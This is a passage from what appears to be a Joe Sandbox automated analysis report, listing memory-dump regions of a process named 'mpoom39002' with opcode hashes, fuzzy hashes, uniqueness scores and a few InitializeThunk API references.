                                    • Source File: 00000006.00000002.610755036.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_590000_mpoom39002.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2825434c1bbad6c72067845868011f5b5330af5f7e0317566add4360fe1861df
                                    • Instruction ID: a92604205c86697e9e2409977fccf0a0863ee24cbc1e26b7bd53076d8c92f71c
                                    • Opcode Fuzzy Hash: 2825434c1bbad6c72067845868011f5b5330af5f7e0317566add4360fe1861df
                                    • Instruction Fuzzy Hash: B9A19075E012288FEB68CF6AC944B9DBBF2BF89300F14D5AAD40CA7251DB345A85CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9ac772abab41d23dc310a85329ed9264e64f55b3a4875d0d43dbeecfbf15f40d
                                    • Instruction ID: dccf4d6822721ff64efbc0eaf595b86271b7aeca9aaf25c66bdd8918389e7f21
                                    • Opcode Fuzzy Hash: 9ac772abab41d23dc310a85329ed9264e64f55b3a4875d0d43dbeecfbf15f40d
                                    • Instruction Fuzzy Hash: 6591F270D00618CFEB14DFA8C884BEDBBB1FF48314F249269E509AB291DB759985CF15
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 0dc44e7800d4db727a119e9260a112908f2d97c0e58b8cae02c9a4b0066cb47e
                                    • Instruction ID: a935913111b8e146fe26f03c2f39a87379cf9c873d3cbe1654b816144ccb8433
                                    • Opcode Fuzzy Hash: 0dc44e7800d4db727a119e9260a112908f2d97c0e58b8cae02c9a4b0066cb47e
                                    • Instruction Fuzzy Hash: 1251DE300256428FCB006F75AEAC4AE7FAAFB4F353B056C51E44AC6C65DFB104D8CA60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: cad71f6bf37adb47e047033134789cf2532f594ab61dc6da8275ab335d8f9085
                                    • Instruction ID: 06720a7da78eac9a8a13507cbce08b108042582a847cc5872bfa083e264181e5
                                    • Opcode Fuzzy Hash: cad71f6bf37adb47e047033134789cf2532f594ab61dc6da8275ab335d8f9085
                                    • Instruction Fuzzy Hash: 2551AB300616568FCB006F75BEAC56EBBAAFB4F353B05AC50E41AC6C659FB104D8CA60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LdrInitializeThunk.NTDLL(000000FF), ref: 001FED02
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 470bbb646e9c90b26a6135a5c7d88db7f4cb077de4338c10c3e2025bbbdf74e1
                                    • Instruction ID: 5ab7a0aa46ec542426c1dd50e9f24d9477738c5f2c360869278156352e3a0f9d
                                    • Opcode Fuzzy Hash: 470bbb646e9c90b26a6135a5c7d88db7f4cb077de4338c10c3e2025bbbdf74e1
                                    • Instruction Fuzzy Hash: 4F51E574D01218DFDB18CFAAD8846EDBBF2BF88314F20C12AE415AB2A4D7749945CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 82339a65bc0d2f2e8e84d850b47aea9ada6ad84bda5c8855023eb0bf33c592a4
                                    • Instruction ID: 178610e506089ade288e910f1f8d4fd5f7ab7167ea11f2f55a40eb49d938ca66
                                    • Opcode Fuzzy Hash: 82339a65bc0d2f2e8e84d850b47aea9ada6ad84bda5c8855023eb0bf33c592a4
                                    • Instruction Fuzzy Hash: 5A51CDB4D0121CCFDB14CFE9D4846ECBBF1BB49315F209529E525AB2A4D7749986CF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610526132.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_16d000_mpoom39002.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f1dbffdbda5c9c8edcfc78581d8c5b5b2f1002de123f9ca2ac36603b22506640
                                    • Instruction ID: f207e55360f9c669e334706274da970dd217a81226a14a9fea5356604f0e82d0
                                    • Opcode Fuzzy Hash: f1dbffdbda5c9c8edcfc78581d8c5b5b2f1002de123f9ca2ac36603b22506640
                                    • Instruction Fuzzy Hash: AA21B075A04340DFDB14DF14EDC4B26BB65EB84314F34C5A9E8494B246C33AD867CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610526132.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_16d000_mpoom39002.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d901ba2131a10237530b1c378adfcf47bd133f4bf10198aaa990114cc4e6c31a
                                    • Instruction ID: 6baf45fdc843e4dd6cbc2bc20099be3736944573ad89ae7abc89654c5beb6630
                                    • Opcode Fuzzy Hash: d901ba2131a10237530b1c378adfcf47bd133f4bf10198aaa990114cc4e6c31a
                                    • Instruction Fuzzy Hash: 1F217C755093808FDB02CF24D994B15BF71EB46314F28C5EAD8498B2A7C33A981ACB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fcc4165498654a4c3032e021ba7daca6de984eb1dfb03a2bdb161f2ffa5ffb5f
                                    • Instruction ID: cf29c8e269fb4b25645e25c39d2c2fd6c29bb44fbc1532592aa83aff80952b4b
                                    • Opcode Fuzzy Hash: fcc4165498654a4c3032e021ba7daca6de984eb1dfb03a2bdb161f2ffa5ffb5f
                                    • Instruction Fuzzy Hash: C652B274E002288FDB64DF64C884BEEBBB2BF89304F1485EAD549A7255D734AE85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b3add45daaea693500b583e880405e3b61dcd66826297c589dac8a56b4915a7f
                                    • Instruction ID: 667f7b91be66f111ec4c95876e6a78797fe8d7d9ca76079dc598ff61f65ec5e2
                                    • Opcode Fuzzy Hash: b3add45daaea693500b583e880405e3b61dcd66826297c589dac8a56b4915a7f
                                    • Instruction Fuzzy Hash: 54B1A974E00218CFDB54DFA5D894A9DBBB2FF88310F2081AAD819AB365DB31AD45CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 858d238b034aa38c6a7cf995846051c16ece7cf59b15f3138fe409c635b7123e
                                    • Instruction ID: 216ea21214edd5ecf563bb903eeb1827cad84189adcbfc17b4861c51140ec0a0
                                    • Opcode Fuzzy Hash: 858d238b034aa38c6a7cf995846051c16ece7cf59b15f3138fe409c635b7123e
                                    • Instruction Fuzzy Hash: 09A19F74A05228CFDB64DF24C894BAEBBB2BF4A300F5085EAD50DA7250DB319E85CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4c7fbf8149ecb09844b0d7cec330642b6a1b2cefb090b5f740847ff68e37cd2
                                    • Instruction ID: 47f8d995d9a5b8e3f04ff7bb76ae227b63fb75b1a988440849615cca64b0e98d
                                    • Opcode Fuzzy Hash: a4c7fbf8149ecb09844b0d7cec330642b6a1b2cefb090b5f740847ff68e37cd2
                                    • Instruction Fuzzy Hash: E6519674E00648CFDB48DFAAD89599DBBF2BF89300F24816AD419AB365DB349946CF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610625948.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d1f23a0ddc87423d56ecf3b01459ceb12c0b90dd5a7153195cb7d562d28a5387
                                    • Instruction ID: 4ebbe4b7b19f3244aed8aec135a7354af2c31e5ce1e01c505f557e6599034c06
                                    • Opcode Fuzzy Hash: d1f23a0ddc87423d56ecf3b01459ceb12c0b90dd5a7153195cb7d562d28a5387
                                    • Instruction Fuzzy Hash: 1E517074A05228CFCB65DF24D854BAEB7B2BF4A305F5085EAD409A7264CB31AE85CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000006.00000002.610707084.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_3f0000_mpoom39002.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bea4b88c322dd4f460db643fa5957f902a8a59c25abe51edd844b96016d5aa67
                                    • Instruction ID: ca76e431c508328d8415e0027bdc75bf5f96aa9678f9388f85b177c142766720
                                    • Opcode Fuzzy Hash: bea4b88c322dd4f460db643fa5957f902a8a59c25abe51edd844b96016d5aa67
                                    • Instruction Fuzzy Hash: 30D09E38D14358DBCF10DF95D9557BDF3B6FB45204F2024A5C108B7600DB305E548A46
                                    Uniqueness

                                    Uniqueness Score: -1.00%